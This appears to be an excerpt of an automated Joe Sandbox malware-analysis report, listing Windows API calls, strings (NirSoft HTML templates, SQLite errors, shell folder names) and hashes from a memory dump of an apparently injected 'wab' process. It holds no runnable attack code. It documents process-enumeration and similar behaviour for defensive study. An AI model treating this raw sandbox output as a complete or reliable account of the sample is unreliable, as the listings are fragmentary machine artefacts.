                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2012295524-70141382
                                                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                  • API String ID: 667068680-3953557276
                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                  • memcpy.MSVCRT ref: 0041234D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                  • String ID:
                                                  • API String ID: 1700100422-0
                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                  • String ID:
                                                  • API String ID: 552707033-0
                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                  • memcpy.MSVCRT ref: 0040C11B
                                                  • strchr.MSVCRT ref: 0040C140
                                                  • strchr.MSVCRT ref: 0040C151
                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                  • memset.MSVCRT ref: 0040C17A
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                  • String ID: 4$h
                                                  • API String ID: 4066021378-1856150674
                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: %%0.%df
                                                  • API String ID: 3473751417-763548558
                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                  • GetParent.USER32(?), ref: 00406136
                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                  • String ID: A
                                                  • API String ID: 2892645895-3554254475
                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                  • memset.MSVCRT ref: 0040DA23
                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                  • String ID: caption
                                                  • API String ID: 973020956-4135340389
                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf$wcscpy
                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                  • API String ID: 1283228442-2366825230
                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcschr.MSVCRT ref: 00413972
                                                  • wcscpy.MSVCRT ref: 00413982
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                  • wcscpy.MSVCRT ref: 004139D1
                                                  • wcscat.MSVCRT ref: 004139DC
                                                  • memset.MSVCRT ref: 004139B8
                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                  • memset.MSVCRT ref: 00413A00
                                                  • memcpy.MSVCRT ref: 00413A1B
                                                  • wcscat.MSVCRT ref: 00413A27
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                  • String ID: \systemroot
                                                  • API String ID: 4173585201-1821301763
                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy
                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                  • API String ID: 1284135714-318151290
                                                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 4066108131-3849865405
                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004082EF
                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                  • memset.MSVCRT ref: 00408362
                                                  • memset.MSVCRT ref: 00408377
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiWide
                                                  • String ID:
                                                  • API String ID: 290601579-0
                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memchrmemset
                                                  • String ID: PD$PD
                                                  • API String ID: 1581201632-2312785699
                                                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                  • GetParent.USER32(?), ref: 00409FA5
                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                  • String ID:
                                                  • API String ID: 2163313125-0
                                                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$wcslen
                                                  • String ID:
                                                  • API String ID: 239872665-3916222277
                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                  • String ID: %s (%s)$YV@
                                                  • API String ID: 3979103747-598926743
                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                  • String ID: Unknown Error$netmsg.dll
                                                  • API String ID: 2767993716-572158859
                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                  • API String ID: 3176057301-2039793938
                                                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                  • unable to open database: %s, xrefs: 0042F84E
                                                  • database %s is already in use, xrefs: 0042F6C5
                                                  • database is already attached, xrefs: 0042F721
                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                  • out of memory, xrefs: 0042F865
                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
